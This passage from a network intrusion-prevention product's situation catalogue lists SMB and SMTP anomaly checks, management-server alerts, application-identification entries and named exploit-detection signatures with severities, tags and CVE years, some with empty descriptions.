Severity: 1
Tags: Protocol Information
First detected in: sgpkg-ips-545-5211
Last changed: sgpkg-ips-1531-5242
Description: A successful SMB or SMB2 protocol write to a share other than "ADMIN$", "C$", or "D$" was detected.
Back to top

SMB_Unknown-File-Identifier

About this situation: SMB data transfer with unknown file identifier detected
Context: SMB without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-160-2032
Description: Data transfer occurred in SMB protocol using a file identifier without existing state information. This is either an SMB anomaly or a result of memory exhaustion in the inspection engine. In the latter case the fingerprinting for this connection may be incomplete.
Back to top

SMB_Write-AndX-Raw-Write-Mode

About this situation: SMB Write AndX used raw write mode
Context: SMB without parameters
Severity: 2
Tags: Suspected Attack Related Anomalies, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-442-4219
Description: An SMB Write AndX request used the raw write mode. This is a rarely used write mode that can be used in IPS/IDS evasion attempts. It is recommended that this situation is terminated.
Back to top

SMB_Write-AndX-Unknown-Write-Mode

About this situation: SMB Write AndX used unknown write mode
Context: SMB without parameters
Severity: 2
Tags: Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-442-4219
Last changed: sgpkg-ips-454-4333
Description: An SMB1 Write AndX request used an unknown write mode. It is possible this is an IPS/IDS evasion attempt. As SMB1 has been replaced with SMB2 and the latest version of the SMB1 protocol does not define the used write mode, this should be reasonably safe to terminate.
Back to top

SMC API HTTPS Certificate expires soon

About this situation: SMC API HTTPS Certificate expires soon
Context: Management Server situation
Severity: 5
Tags: SMC
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1535-5242
Description: The SMC API HTTPS Certificate for the Management Server expires in less than 90 days. Create new TLS Server Credentials for the Management Server.
Back to top

SMC API HTTPS Certificate has expired

About this situation: SMC API HTTPS Certificate has expired
Context: Management Server situation
Severity: 7
Tags: SMC
First detected in: sgpkg-ips-982-5242
Last changed: sgpkg-ips-1296-5242
Description: The SMC API HTTPS Certificate for the Management Server has expired. Create new TLS Server Credentials for the Management Server.
Back to top

SMC Appliance patch installation failed

About this situation: SMC Appliance patch installation failed
Context: Management Server situation
Severity: 6
Tags: SMC
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1296-5242
Description: The installation of the SMC Appliance patch failed.
Back to top

SMC Server: disk error

About this situation: SMC Server: disk error
Context: Log Server situations
Severity: 10
Tags: SMC
First detected in: sgpkg-ips-1094-5242
Last changed: sgpkg-ips-1296-5242
Description: There was an error when trying to store audit. Check access to the disk.
Back to top

SME-Group

About this situation: Application SME-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SME Group is a technology company that provides electronic controllers and related products for application in battery powered vehicles, mainly for electrical traction and specialized in the development of AC power controllers.
Back to top

SMEStorage

About this situation: Application SMEStorage detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The SME solution allows IT to regain control of
Back to top

SMG

About this situation: Application SMG detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SMG Reporting - Online Reporting System, provides actionable insights and recommendations at both the front-line and senior executive levels.
Back to top

Smilebox

About this situation: Smilebox usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Photo/Video Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to create e-cards, scrapbooks, slideshows, photobooks, and postcards with their photos, videos, and music.
Back to top

Smore

About this situation: Application Smore detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Smore is online promotion tool, for small businesses to promote themselves online
Back to top

SMScloud

About this situation: Application SMScloud detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SMS Cloud is an SMS Gateway service.
Back to top

SMTP

About this situation: Simple Mail Transfer Protocol (SMTP) traffic
Context: Application Context
Severity: 1
Tags: Protocols, Mail, Application Routing
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1509-5242
Description: Simple Mail Transfer Protocol (SMTP) usage. SMTP is an Internet standard for e-mail transmission across internet.
Back to top

SMTP-Transaction-None

About this situation: No e-mail transfer attempted during SMTP session
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-240-3038
Description: No e-mail transfer was attempted during an SMTP session. There was no SMTP DATA or BDAT command in the SMTP session and no e-mail was transferred. Risk analysis: Risk level is fairly low.
Back to top

SMTP.com

About this situation: Application SMTP.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SMTP, Inc. provides email sending and delivery services for small to enterprise level companies worldwide.
Back to top

SMTP_Angle-Bracket-Missing

About this situation: SMTP command forward or reverse path missing angle brackets
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An SMTP command forward or reverse path was missing angle brackets. The command does not follow the SMTP specification [RFC 2821]. Many servers accept a forward or reverse path even without the angle brackets. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Angle-Bracket-Missing-Success

About this situation: SMTP server did not refuse command with missing angle brackets in forward or reverse path
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An SMTP server did not refuse a command with missing angle brackets in a forward or reverse path. The command did not follow the SMTP specification [RFC 2821]. Many servers accept a forward or reverse path even without the angle brackets. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Bash-Shellshock-Code-Injection

About this situation: An attempt to exploit a vulnerability in bash detected
Context: SMTP Client Command Stream
Severity: 7
Tags: Any Operating System, Any Hardware, bash, CVE2014, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-607-5211
Last changed: sgpkg-ips-607-5211
Vulnerability: Bash-Shellshock-Code-Injection
Description:
Back to top

SMTP_CCS-Asn-1-Integer-BOF-MS04-007

About this situation: Detects exploits against the Microsoft ASN.1 library via a malformed SPNEGO token in SMTP GSSAPI authentication
Context: SMTP Client Stream
Severity: 10
Tags: Windows XP, Windows 2000, Windows 2003, Windows NT 4.0, Any Hardware, MS2004, CVE2003, Windows XP not specific, Windows 2000 not specific, Windows 2003 not specific, Windows NT 4.0 not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-158-2032
Vulnerability: Asn-1-Integer-BOF-MS04-007
Description:
Back to top

SMTP_CCS-Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in RoundCube RoundCube Webmail detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, RoundCube Webmail, CVE2024, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1779-5242
Last changed: sgpkg-ips-1779-5242
Vulnerability: Roundcube-Webmail-Html4inline-Stored-Cross-Site-Scripting
Description:
Back to top

SMTP_Citadel-SMTP-RCPT-To-Buffer-Overflow

About this situation: Buffer Overflow in Citadel SMTP Server
Context: SMTP Client Command Stream
Severity: 7
Tags: Unix, Any Hardware, Citadel Server, CVE2008, Unix not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-395-4219
Last changed: sgpkg-ips-395-4219
Vulnerability: SMTP_Citadel-SMTP-RCPT-To-Remote-Buffer-Overflow
Description:
Back to top

SMTP_Client-Obsolete

About this situation: SMTP client started session with HELO command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-161-2032
Description: An SMTP client started a session with the HELO command. According to the current SMTP specification [RFC 2821], the client should start with EHLO instead of HELO, and revert back to HELO only if the server replies with an error to EHLO. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Command-After-Quit

About this situation: SMTP client sent command after giving QUIT command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: An SMTP client sent another command after giving the QUIT command. An SMTP connection should be terminated after the client has sent a QUIT command and the server has sent a corresponding reply. However, the client did not close the connection but sent another command after QUIT. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Command-After-Quit-Success

About this situation: SMTP server did not reject command client sent after QUIT
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SMTP server did not reject the command that the client sent after QUIT. An SMTP connection should be terminated after the client has sent a QUIT command and the server has sent a corresponding reply. However, the client did not close the connection but sent another command after QUIT. This event was generated because the server did not send an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Command-Sequence-Incorrect

About this situation: SMTP client issued commands in incorrect sequence
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An SMTP client issued commands in an incorrect sequence. The client sent an unexpected command for the current SMTP transaction state. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP misplaced command" shows the unexpected command in the current command sequence. "SMTP transaction state" shows the current state of the SMTP transaction.
Back to top

SMTP_Command-Sequence-Incorrect-Success

About this situation: SMTP server did not refuse incorrect command sequence
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-160-2032
Description: An SMTP server did not refuse an incorrect command sequence. The client sent an unexpected command for the current SMTP transaction state. This event was generated because the server did not sent an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Command-Stream-Success

About this situation: SMTP server did not refuse SMTP command with fingerprint match
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-248-3038
Description: A fingerprint matched in the SMTP command, but the server did not send an error message. Risk level is low.
Back to top

SMTP_Command-Syntax-Incorrect

About this situation: SMTP command used incorrect syntax
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An SMTP command used incorrect syntax. The client sent a command that does not follow the SMTP protocol. The command may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP inspection module, or the client may be trying to do something suspicious. Risk analysis: Risk level is medium.
Back to top

SMTP_Command-Syntax-Incorrect-Success

About this situation: SMTP server did not refuse SMTP command that used incorrect syntax
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An SMTP server did not refuse an SMTP command that used incorrect syntax. The client sent a command that does not follow the SMTP protocol. The command may be misspelled (if the client is an interactive user instead of an SMTP client program), the command may use an extension that is not implemented in the SMTP inspection module, or the client may be trying to do something suspicious. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is medium. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Command-Too-Long

About this situation: Client sent too long SMTP command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: The client sent an SMTP command that was too long. The SMTP command was too long to conform the SMTP specification [RFC 2821] and the possible extensions that the server advertised [RFC 1652], [RFC 1870], [RFC 3030], [RFC 1845], [RFC 1891], [RFC 2852], and [RFC 2554]. Risk analysis: Risk level is medium. Very long commands can be used in buffer overflow attacks.
Back to top

SMTP_Command-Too-Long-Success

About this situation: SMTP server did not refuse too long command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SMTP server did not refuse a command that was too long. The client sent an SMTP command that was too long to conform the SMTP specification [RFC 2821] and possible extensions that the server advertised [RFC 1652], [RFC 1870], [RFC 3030], [RFC 1845], [RFC 1891], [RFC 2852], and [RFC 2554]. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Very long commands can be used in buffer overflow attacks.
Back to top

SMTP_Command-Unknown-Local-Extension

About this situation: Unknown SMTP command detected - possibly local SMTP extension
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An unknown SMTP command was detected. The command is possibly a local SMTP extension. The SMTP client sent a command that the SMTP inspection module does not recognize. Since the command starts with an X, it may be a local SMTP extension. The inspection module cannot interpret the command, so it will not be inspected further. Microsoft Exchange Server may create these events. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Command-Unknown-Local-Extension-Success

About this situation: SMTP server did not refuse an unknown SMTP command, which was possibly a local SMTP extension
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-106-2032
Description: An SMTP server did not refuse an unknown SMTP command. The command is possibly a local SMTP extension. The SMTP client sent a command that the SMTP inspection module does not recognize. Since the command starts with an X, it may be a local SMTP extension. This event was generated because the server did not give an error reply to the command. Microsoft Exchange Server may create these events. If this is the case, the suggested solution is to disable this situation for the Exchange Servers. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Command-Whitespace-Before

About this situation: Whitespace character(s) detected before SMTP command
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: Whitespace character(s) were detected before an SMTP command. The SMTP client sent one or more whitespace characters before giving the next SMTP command. This violates the SMTP specification [RFC 2821]. Since some servers accept this behavior, the SMTP inspection module skips the whitespace. Risk analysis: Risk level is fairly low.
Back to top

SMTP_Command-Whitespace-Before-Success

About this situation: Command with whitespace character(s) before command name not refused
Context: SMTP without parameters
Severity: 2
Tags: Protocol Information
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-337-4219
Description: An SMTP server did not refuse a command that had whitespace character(s) before the command name. The SMTP client sent one or more whitespace characters before giving the next SMTP command. This violates the SMTP specification [RFC 2821]. Since some servers accept this behavior, the SMTP inspection module skips the whitespace. This event was generated because the server did not give an error reply to the command. Risk analysis: Risk level is fairly low. Most relevant log fields: "SMTP server action" describes the server action: 1) connection terminated, 2) server violated the protocol in reply, 3) server replied "OK"
Back to top

SMTP_Commands-Unprocessed-At-EOF

About this situation: Unanswered commands remained at end of SMTP session
Context: SMTP without parameters
Severity: 2
Tags: Protocol Violations, Anomalies
First detected in: sgpkg-ips-67-1314
Last changed: sgpkg-ips-371-4219
Description: Unanswered commands remained at the end of an SMTP session. One or more commands sent by the SMTP client were still unanswered when the connection terminated. Risk analysis: Risk level is fairly low.
Back to top

SMTP_CS-Data-Command-Very-Large-Header-Section

About this situation: Very large header section in DATA command detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CVE2010, Any Operating System not specific, Suspected Attack Related Anomalies, Anomalies, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-614-5211
Vulnerability: Exim-String-Format-Remote-Code-Execution
Description:
Back to top

SMTP_CS-Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read

About this situation: An attempt to exploit a vulnerability in Dovecot Dovecot detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1055-5242
Last changed: sgpkg-ips-1820-5242
Vulnerability: Dovecot-Rfc822_Parse_Domain-Out-Of-Bounds-Read
Description:
Back to top

SMTP_CS-Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS

About this situation: An attempt to exploit a vulnerability in Dovecot detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2020, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1249-5242
Last changed: sgpkg-ips-1249-5242
Vulnerability: Dovecot-Submission-Login-And-LMTP-Infinite-Loop-DoS
Description:
Back to top

SMTP_CS-Dovecot-Submission-Login-Service-Auth-DoS

About this situation: An attempt to exploit a vulnerability in Dovecot Submission-Login Service detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Dovecot, CVE2019, Any Operating System not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1165-5242
Last changed: sgpkg-ips-1166-5242
Vulnerability: Dovecot-Submission-Login-Service-Auth-DoS
Description:
Back to top

SMTP_CS-Exim-B64decode-Off-By-One

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2018, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1064-5242
Last changed: sgpkg-ips-1064-5242
Vulnerability: Exim-B64decode-Off-By-One
Description:
Back to top

SMTP_CS-Exim-Bdat-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2017, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1022-5242
Last changed: sgpkg-ips-1022-5242
Vulnerability: Exim-Bdat-Denial-Of-Service
Description:
Back to top

SMTP_CS-Exim-Buffer-Overflows

About this situation: An attempt to exploit a vulnerability in Exim Project Exim detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2004, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-436-4219
Vulnerability: Exim-Buffer-Overflows
Description:
Back to top

SMTP_CS-Exim-Deliver_Message-Command-Injection

About this situation: An attempt to exploit a vulnerability in Exim detected
Context: SMTP Client Stream
Severity: 10
Tags: Any Operating System, Any Hardware, Exim, CVE2019, Any Operating System not specific, Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1169-5242
Last changed: sgpkg-ips-1441-5242
Vulnerability: Exim-Deliver_Message-Command-Injection
Description:
Back to top

SMTP_CS-Exim-External-Authenticator-Out-Of-Bounds-Write

About this situation: An attempt to exploit a vulnerability in Exim detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2023, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1690-5242
Last changed: sgpkg-ips-1690-5242
Vulnerability: Exim-External-Authenticator-Out-Of-Bounds-Write
Description:
Back to top

SMTP_CS-Exim-Remote-Code-Execution-CVE-2019-15846

About this situation: An attempt to exploit a vulnerability in Exim detected
Context: SMTP Client Stream
Severity: 7
Tags: Linux, Any Hardware, Exim, CVE2019, Linux not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1210-5242
Vulnerability: Exim-Remote-Code-Execution-CVE-2019-15846
Description:
Back to top

SMTP_CS-Exim-String-Format-Remote-Code-Execution

About this situation: Attempt to exploit a vulnerability in Exim.org Exim4 detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exim, CVE2010, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-870-5242
Vulnerability: Exim-String-Format-Remote-Code-Execution
Description:
Back to top

SMTP_CS-Generic-Trojan-SMTP-Infection-Traffic

About this situation: Generic trojan infection traffic detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1355-5242
Vulnerability: Generic-Trojan-SMTP-Infection-Traffic
Description:
Back to top

SMTP_CS-IBM-Lotus-Domino-Mailto-Buffer-Overflow

About this situation: An attempt to exploit an IBM Lotus Domino Mailto Buffer Overflow vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Domino, CVE2010, Any Operating System not specific, Lotus Domino not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-720-5211
Last changed: sgpkg-ips-720-5211
Vulnerability: IBM-Lotus-Domino-Mailto-Buffer-Overflow
Description:
Back to top

SMTP_CS-IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in IBM Lotus Notes detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Lotus Notes, CVE2007, Any Operating System not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-377-4219
Last changed: sgpkg-ips-377-4219
Vulnerability: IBM-Lotus-Notes-Applix-Graphics-Parsing-Buffer-Overflow
Description:
Back to top

SMTP_CS-Interactive-Data-Esignal-Stack-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Interactive Data eSignal detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Interactive Data eSignal, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-1332-5242
Last changed: sgpkg-ips-1332-5242
Vulnerability: Interactive-Data-Esignal-StyleTemplate-Buffer-Overflow
Description:
Back to top

SMTP_CS-Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Ipswitch IMail Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IMail, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Ipswitch-IMail-List-Mailer-Reply-To-Address-Buffer-Overflow
Description:
Back to top

SMTP_CS-Ipswitch-IMail-StartTLS-Plaintext-Command-Injection

About this situation: An attempt to exploit a vulnerability in Ipswitch IMail Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, IMail, CVE2011, Any Operating System not specific, Potential Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-383-4219
Last changed: sgpkg-ips-384-4219
Vulnerability: Ipswitch-IMail-StartTLS-Plaintext-Command-Injection
Description:
Back to top

SMTP_CS-MailCarrier-Buffer-Overflow

About this situation: An attempt to exploit a MailCarrier Buffer Overflow vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, MailCarrier, CVE2004, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-735-5211
Vulnerability: MailCarrier-Buffer-Overflow
Description:
Back to top

SMTP_CS-Microsoft-Excel-Null-Pointer-DoS

About this situation: An attempt to exploit a Microsoft Excel Null Pointer DoS vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Excel 2003, CVE2007, Windows not specific, Suspected Denial of Service, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-674-5211
Last changed: sgpkg-ips-674-5211
Vulnerability: Microsoft-Excel-Null-Pointer-DoS
Description:
Back to top

SMTP_CS-Microsoft-Exchange-TNEF-Decoding-MS09-003-Bp

About this situation: Buffer overflow exploit against Microsoft Exchange TNEF decoding vulnerability
Context: SMTP Client Stream
Severity: 7
Tags: Windows, x86, Exchange Server 2003, Exchange Server 2000, Exchange Server 2007, MS2009-02, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-247-3038
Last changed: sgpkg-ips-438-4219
Vulnerability: Microsoft-Exchange-TNEF-Buffer-Overflow-MS09-003
Description:
Back to top

SMTP_CS-Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Malware Protection Engine detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Forefront Client Security, Microsoft Antigen, Microsoft Forefront Security for Exchange Server, Microsoft Forefront Security for SharePoint, Microsoft Standalone System Sweeper, Microsoft Windows Defender, Microsoft Windows Live OneCare, MS2008-05, CVE2008, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-625-5211
Last changed: sgpkg-ips-625-5211
Vulnerability: Microsoft-Malware-Protection-Engine-File-Processing-Denial-Of-Service
Description:
Back to top

SMTP_CS-Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service

About this situation: An attempt to exploit a vulnerability in Microsoft Outlook detected
Context: SMTP Client Stream
Severity: 2
Tags: Windows, Any Hardware, Microsoft Outlook, CVE2022, Windows not specific, Potential Denial of Service, TCP Client Traffic
First detected in: sgpkg-ips-1505-5242
Last changed: sgpkg-ips-1505-5242
Vulnerability: Microsoft-Outlook-Outlmime.dll-Content-Type-Denial-Of-Service
Description:
Back to top

SMTP_CS-Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Exchange Server, MS2008-07, CVE2008, Any Operating System not specific, Exchange Server not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-379-4219
Vulnerability: Microsoft-Outlook-Web-Access-HTML-Validating-Cross-Site-Scripting
Description:
Back to top

SMTP_CS-Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow

About this situation: An attempt to exploit a Microsoft Windows ASX File Parsing Remote Buffer Overflow vulnerability detected.
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Windows Media Player, CVE2012, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-787-5211
Last changed: sgpkg-ips-787-5211
Vulnerability: Microsoft-Windows-ASX-File-Parsing-Remote-Buffer-Overflow
Description:
Back to top

SMTP_CS-NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in NJStar Communicator's MiniSMTP Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, NJStar Communicator MiniSMTP, CVE2011, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-655-5211
Last changed: sgpkg-ips-655-5211
Vulnerability: NJStar-Communicator-MiniSMTP-Server-Buffer-Overflow
Description:
Back to top

SMTP_CS-Novell-Groupwise-Auth-Login-BOF

About this situation: Attempt to exploit buffer overflow vulnerability in Novell GroupWise Server detected
Context: SMTP Client Stream
Severity: 7
Tags: Windows, Any Hardware, Novell GroupWise, CVE2009, Windows not specific, Suspected Compromise, TCP Correlation Dependency Group, Severity over 4 Correlation Dependency Group, TCP Client Traffic
First detected in: sgpkg-ips-223-3038
Last changed: sgpkg-ips-277-4219
Vulnerability: Novell-Groupwise-Internet-Agent-SMTP-Auth-Login-Command-Buffer-Overflow
Description:
Back to top

